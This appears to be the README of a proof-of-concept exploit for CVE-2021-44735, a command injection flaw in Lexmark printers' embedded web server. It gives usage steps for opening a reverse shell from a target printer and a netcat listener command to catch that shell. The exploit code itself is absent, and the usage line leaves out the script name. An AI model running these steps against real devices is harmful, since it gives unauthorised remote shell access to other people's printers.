# CVE-2021-44735 PoC

Embedded web server command injection vulnerability in Lexmark devices.
Exploit based on the following research

## Using

To run the exploit pass 3 arguments:

- rhost - printer IP-address
- lhost - IP-address of the interface for reverse-shell connection
- lport - port number for reverse-shell connection

python3 -r <rhost> -l <lhost> -p <lport>


To receive a reverse-shell connection start listener on the specified lhost and lport, for example using `netcat`:

nc -nvlp 80